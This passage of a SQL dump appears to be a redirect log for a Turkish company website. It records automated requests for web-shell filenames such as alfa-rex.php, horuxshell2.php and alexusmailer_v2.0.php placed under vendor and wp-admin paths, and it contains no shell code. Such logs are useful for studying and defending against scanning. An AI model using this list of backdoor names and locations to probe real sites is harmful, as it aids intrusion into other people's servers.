00:00:00',301),(52287,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:07:50','0000-00-00 00:00:00',301),(52288,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/whoops/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:51','0000-00-00 00:00:00',301),(52289,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:52','0000-00-00 00:00:00',301),(52290,'http://3s-technologies.com.tr/en/vendor/filp/whoops/src/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:07:53','0000-00-00 00:00:00',301),(52291,'http://3s-technologies.com.tr/en/vendor/fruitcake/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:07:54','0000-00-00 00:00:00',301),(52292,'http://3s-technologies.com.tr/en/vendor/fruitcake/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:55','0000-00-00 00:00:00',301),(52293,'http://3s-technologies.com.tr/en/vendor/graham-campbell/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:07:56','0000-00-00 00:00:00',301),(52294,'http://3s-technologies.com.tr/en/vendor/graham-campbell/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:57','0000-00-00 00:00:00',301),(52295,'http://3s-technologies.com.tr/en/vendor/graham-campbell/result-type/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:07:58','0000-00-00 00:00:00',301),(52296,'http://3s-technologies.com.tr/en/vendor/graham-campbell/result-type/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:07:59','0000-00-00 00:00:00',301),(52297,'http://3s-technologies.com.tr/en/vendor/graham-campbell/result-type/src/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:00','0000-00-00 00:00:00',301),(52298,'http://3s-technologies.com.tr/en/vendor/graham-campbell/result-type/src/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:08:00','0000-00-00 00:00:00',301),(52299,'http://3s-technologies.com.tr/en/vendor/hamcrest/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:01','0000-00-00 00:00:00',301),(52300,'http://3s-technologies.com.tr/en/vendor/hamcrest/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:02','0000-00-00 00:00:00',301),(52301,'http://3s-technologies.com.tr/en/vendor/iankumu/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:03','0000-00-00 00:00:00',301),(52302,'http://3s-technologies.com.tr/en/vendor/iankumu/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:08:04','0000-00-00 00:00:00',301),(52303,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:05','0000-00-00 00:00:00',301),(52304,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:08:06','0000-00-00 00:00:00',301),(52305,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/config/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:07','0000-00-00 00:00:00',301),(52306,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/config/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:07','0000-00-00 00:00:00',301),(52307,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/console/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:09','0000-00-00 00:00:00',301),(52308,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/console/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:08:09','0000-00-00 00:00:00',301),(52309,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/exceptions/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:08:10','0000-00-00 00:00:00',301),(52310,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/exceptions/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:11','0000-00-00 00:00:00',301),(52311,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/facades/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:08:12','0000-00-00 00:00:00',301),(52312,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/facades/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:08:13','0000-00-00 00:00:00',301),(52313,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/utils/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:08:14','0000-00-00 00:00:00',301),(52314,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/utils/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:08:15','0000-00-00 00:00:00',301),(52315,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:08:16','0000-00-00 00:00:00',301),(52316,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:08:17','0000-00-00 00:00:00',301),(52317,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/certificates/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:08:18','0000-00-00 00:00:00',301),(52318,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/src/certificates/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:08:18','0000-00-00 00:00:00',301),(52319,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/tests/unit/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:08:19','0000-00-00 00:00:00',301),(52320,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/tests/unit/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:20','0000-00-00 00:00:00',301),(52321,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/tests/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:21','0000-00-00 00:00:00',301),(52322,'http://3s-technologies.com.tr/en/vendor/iankumu/mpesa/tests/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:22','0000-00-00 00:00:00',301),(52323,'http://3s-technologies.com.tr/en/vendor/laminas/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:08:23','0000-00-00 00:00:00',301),(52324,'http://3s-technologies.com.tr/en/vendor/laminas/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:08:24','0000-00-00 00:00:00',301),(52325,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:08:25','0000-00-00 00:00:00',301),(52326,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:26','0000-00-00 00:00:00',301),(52327,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/exception/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:27','0000-00-00 00:00:00',301),(52328,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/exception/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:08:27','0000-00-00 00:00:00',301),(52329,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/docblock/tag/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:08:28','0000-00-00 00:00:00',301),(52330,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/docblock/tag/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:29','0000-00-00 00:00:00',301),(52331,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/docblock/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:08:30','0000-00-00 00:00:00',301),(52332,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/docblock/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:08:31','0000-00-00 00:00:00',301),(52333,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/enumgenerator/cases/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:08:32','0000-00-00 00:00:00',301),(52334,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/enumgenerator/cases/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:08:33','0000-00-00 00:00:00',301),(52335,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/enumgenerator/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:08:34','0000-00-00 00:00:00',301),(52336,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/enumgenerator/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:08:35','0000-00-00 00:00:00',301),(52337,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/exception/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:08:36','0000-00-00 00:00:00',301),(52338,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/exception/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:37','0000-00-00 00:00:00',301),(52339,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/typegenerator/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:08:37','0000-00-00 00:00:00',301),(52340,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/typegenerator/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:08:38','0000-00-00 00:00:00',301),(52341,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:08:39','0000-00-00 00:00:00',301),(52342,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generator/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:40','0000-00-00 00:00:00',301),(52343,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generic/prototype/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:08:41','0000-00-00 00:00:00',301),(52344,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generic/prototype/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:08:42','0000-00-00 00:00:00',301),(52345,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generic/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:08:43','0000-00-00 00:00:00',301),(52346,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/generic/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:43','0000-00-00 00:00:00',301),(52347,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/reflection/docblock/tag/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:44','0000-00-00 00:00:00',301),(52348,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/reflection/docblock/tag/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:45','0000-00-00 00:00:00',301),(52349,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/reflection/docblock/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:08:46','0000-00-00 00:00:00',301),(52350,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/reflection/docblock/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:47','0000-00-00 00:00:00',301),(52351,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/reflection/exception/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:08:48','0000-00-00 00:00:00',301),(52352,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/reflection/exception/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:08:49','0000-00-00 00:00:00',301),(52353,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/reflection/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:08:49','0000-00-00 00:00:00',301),(52354,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/reflection/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:08:50','0000-00-00 00:00:00',301),(52355,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/scanner/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:08:51','0000-00-00 00:00:00',301),(52356,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/scanner/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:08:52','0000-00-00 00:00:00',301),(52357,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:08:53','0000-00-00 00:00:00',301),(52358,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-code/src/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:08:54','0000-00-00 00:00:00',301),(52359,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:55','0000-00-00 00:00:00',301),(52360,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:08:56','0000-00-00 00:00:00',301),(52361,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/src/exception/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:08:57','0000-00-00 00:00:00',301),(52362,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/src/exception/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:08:57','0000-00-00 00:00:00',301),(52363,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/src/request/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:08:58','0000-00-00 00:00:00',301),(52364,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/src/request/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:08:59','0000-00-00 00:00:00',301),(52365,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/src/response/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:09:00','0000-00-00 00:00:00',301),(52366,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/src/response/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:09:01','0000-00-00 00:00:00',301),(52367,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/src/serverrequestfilter/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:02','0000-00-00 00:00:00',301),(52368,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/src/serverrequestfilter/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:03','0000-00-00 00:00:00',301),(52369,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/src/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:04','0000-00-00 00:00:00',301),(52370,'http://3s-technologies.com.tr/en/vendor/laminas/laminas-diactoros/src/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:09:05','0000-00-00 00:00:00',301),(52371,'http://3s-technologies.com.tr/en/wp-admin/ahdu.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:06','0000-00-00 00:00:00',301),(52372,'http://3s-technologies.com.tr/en/wp-admin/alexusmailer_v2.0.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:09:06','0000-00-00 00:00:00',301),(52373,'http://3s-technologies.com.tr/en/wp-includes/requests/network.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:07','0000-00-00 00:00:00',301),(52374,'http://3s-technologies.com.tr/en/wp-admin/css/evtypy.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:09:08','0000-00-00 00:00:00',301),(52375,'http://3s-technologies.com.tr/en/wp-includes/images/wp-login.php',NULL,'https://www.yahoo.com/','',19,0,'2025-12-20 05:09:09','0000-00-00 00:00:00',301),(52376,'http://3s-technologies.com.tr/en/wp-admin/css/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:09:10','0000-00-00 00:00:00',301),(52377,'http://3s-technologies.com.tr/en/wp-admin/css/colors/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:09:11','0000-00-00 00:00:00',301),(52378,'http://3s-technologies.com.tr/en/wp-admin/css/colors/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:09:12','0000-00-00 00:00:00',301),(52379,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:12','0000-00-00 00:00:00',301),(52380,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:09:14','0000-00-00 00:00:00',301),(52381,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/bs.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:09:15','0000-00-00 00:00:00',301),(52382,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/nsts.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:09:16','0000-00-00 00:00:00',301),(52383,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/test1.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:09:17','0000-00-00 00:00:00',301),(52384,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:09:17','0000-00-00 00:00:00',301),(52385,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/about.php',NULL,'https://www.google.co.uk/','',4,0,'2025-12-20 05:09:18','0000-00-00 00:00:00',301),(52386,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:09:19','0000-00-00 00:00:00',301),(52387,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:09:20','0000-00-00 00:00:00',301),(52388,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ectoplasm/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:09:22','0000-00-00 00:00:00',301),(52389,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ectoplasm/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:09:23','0000-00-00 00:00:00',301),(52390,'http://3s-technologies.com.tr/en/wp-admin/css/colors/light/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:09:24','0000-00-00 00:00:00',301),(52391,'http://3s-technologies.com.tr/en/wp-admin/css/colors/light/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:09:25','0000-00-00 00:00:00',301),(52392,'http://3s-technologies.com.tr/en/wp-admin/css/colors/midnight/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:27','0000-00-00 00:00:00',301),(52393,'http://3s-technologies.com.tr/en/wp-admin/css/colors/midnight/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:09:28','0000-00-00 00:00:00',301),(52394,'http://3s-technologies.com.tr/en/wp-admin/css/colors/midnight/dvsukfbn.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:09:29','0000-00-00 00:00:00',301),(52395,'http://3s-technologies.com.tr/en/wp-admin/css/colors/midnight/vzqply.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:30','0000-00-00 00:00:00',301),(52396,'http://3s-technologies.com.tr/en/wp-admin/css/colors/midnight/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:09:31','0000-00-00 00:00:00',301),(52397,'http://3s-technologies.com.tr/en/wp-admin/css/colors/modern/qgrisc.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:32','0000-00-00 00:00:00',301),(52398,'http://3s-technologies.com.tr/en/wp-admin/css/colors/modern/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:09:33','0000-00-00 00:00:00',301),(52399,'http://3s-technologies.com.tr/en/wp-admin/css/colors/modern/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:34','0000-00-00 00:00:00',301),(52400,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ocean/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:09:36','0000-00-00 00:00:00',301),(52401,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ocean/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:09:37','0000-00-00 00:00:00',301),(52402,'http://3s-technologies.com.tr/en/wp-admin/css/colors/picker.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:09:38','0000-00-00 00:00:00',301),(52403,'http://3s-technologies.com.tr/en/wp-admin/css/colors/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:09:39','0000-00-00 00:00:00',301),(52404,'http://3s-technologies.com.tr/en/wp-admin/horuxshell2.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:09:40','0000-00-00 00:00:00',301),(52405,'http://3s-technologies.com.tr/en/wp-admin/includes/admin-filters.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:09:41','0000-00-00 00:00:00',301),(52406,'http://3s-technologies.com.tr/en/wp-admin/includes/admin.php',NULL,'https://www.google.fr/','',3,0,'2025-12-20 05:09:42','0000-00-00 00:00:00',301),(52407,'http://3s-technologies.com.tr/en/wp-admin/includes/ajax-actions.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:09:43','0000-00-00 00:00:00',301),(52408,'http://3s-technologies.com.tr/en/wp-admin/includes/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:09:44','0000-00-00 00:00:00',301),(52409,'http://3s-technologies.com.tr/en/wp-admin/includes/bookmark.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:09:45','0000-00-00 00:00:00',301),(52410,'http://3s-technologies.com.tr/en/wp-admin/includes/class-automatic-upgrader-skin.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:09:46','0000-00-00 00:00:00',301),(52411,'http://3s-technologies.com.tr/en/wp-admin/includes/class-bulk-plugin-upgrader-skin.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:47','0000-00-00 00:00:00',301),(52412,'http://3s-technologies.com.tr/en/wp-admin/includes/class-bulk-theme-upgrader-skin.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:09:48','0000-00-00 00:00:00',301),(52413,'http://3s-technologies.com.tr/en/wp-admin/includes/class-bulk-upgrader-skin.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:09:49','0000-00-00 00:00:00',301),(52414,'http://3s-technologies.com.tr/en/wp-admin/includes/class-core-upgrader.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:09:50','0000-00-00 00:00:00',301),(52415,'http://3s-technologies.com.tr/en/wp-admin/includes/class-custom-background.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:09:51','0000-00-00 00:00:00',301),(52416,'http://3s-technologies.com.tr/en/wp-admin/includes/class-custom-image-header.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:09:52','0000-00-00 00:00:00',301),(52417,'http://3s-technologies.com.tr/en/wp-admin/includes/class-file-upload-upgrader.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:09:53','0000-00-00 00:00:00',301),(52418,'http://3s-technologies.com.tr/en/wp-admin/includes/class-ftp-pure.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:09:54','0000-00-00 00:00:00',301),(52419,'http://3s-technologies.com.tr/en/wp-admin/includes/class-ftp-sockets.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:09:55','0000-00-00 00:00:00',301),(52420,'http://3s-technologies.com.tr/en/wp-admin/includes/class-ftp.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:56','0000-00-00 00:00:00',301),(52421,'http://3s-technologies.com.tr/en/wp-admin/includes/class-language-pack-upgrader-skin.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:09:57','0000-00-00 00:00:00',301),(52422,'http://3s-technologies.com.tr/en/wp-admin/includes/class-language-pack-upgrader.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:09:58','0000-00-00 00:00:00',301),(52423,'http://3s-technologies.com.tr/en/wp-admin/includes/class-pclzip.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:09:58','0000-00-00 00:00:00',301),(52424,'http://3s-technologies.com.tr/en/wp-admin/includes/class-plugin-installer-skin.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:09:59','0000-00-00 00:00:00',301),(52425,'http://3s-technologies.com.tr/en/wp-admin/includes/class-plugin-upgrader-skin.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:10:00','0000-00-00 00:00:00',301),(52426,'http://3s-technologies.com.tr/en/wp-admin/includes/class-plugin-upgrader.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:10:01','0000-00-00 00:00:00',301),(52427,'http://3s-technologies.com.tr/en/wp-admin/includes/class-theme-installer-skin.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:10:02','0000-00-00 00:00:00',301),(52428,'http://3s-technologies.com.tr/en/wp-admin/includes/class-theme-upgrader-skin.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:03','0000-00-00 00:00:00',301),(52429,'http://3s-technologies.com.tr/en/wp-admin/includes/class-theme-upgrader.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:10:04','0000-00-00 00:00:00',301),(52430,'http://3s-technologies.com.tr/en/wp-admin/includes/class-walker-category-checklist.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:10:05','0000-00-00 00:00:00',301),(52431,'http://3s-technologies.com.tr/en/wp-admin/includes/class-walker-nav-menu-checklist.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:10:05','0000-00-00 00:00:00',301),(52432,'http://3s-technologies.com.tr/en/wp-admin/includes/class-walker-nav-menu-edit.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:06','0000-00-00 00:00:00',301),(52433,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-ajax-upgrader-skin.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:10:07','0000-00-00 00:00:00',301),(52434,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-application-passwords-list-table.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:10:08','0000-00-00 00:00:00',301),(52435,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-automatic-updater.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:09','0000-00-00 00:00:00',301),(52436,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-comments-list-table.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:10','0000-00-00 00:00:00',301),(52437,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-community-events.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:10:11','0000-00-00 00:00:00',301),(52438,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-debug-data.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:12','0000-00-00 00:00:00',301),(52439,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-filesystem-base.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:10:13','0000-00-00 00:00:00',301),(52440,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-filesystem-direct.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:14','0000-00-00 00:00:00',301),(52441,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-filesystem-ftpext.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:15','0000-00-00 00:00:00',301),(52442,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-filesystem-ftpsockets.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:10:16','0000-00-00 00:00:00',301),(52443,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-filesystem-ssh2.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:10:17','0000-00-00 00:00:00',301),(52444,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-importer.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:18','0000-00-00 00:00:00',301),(52445,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-internal-pointers.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:19','0000-00-00 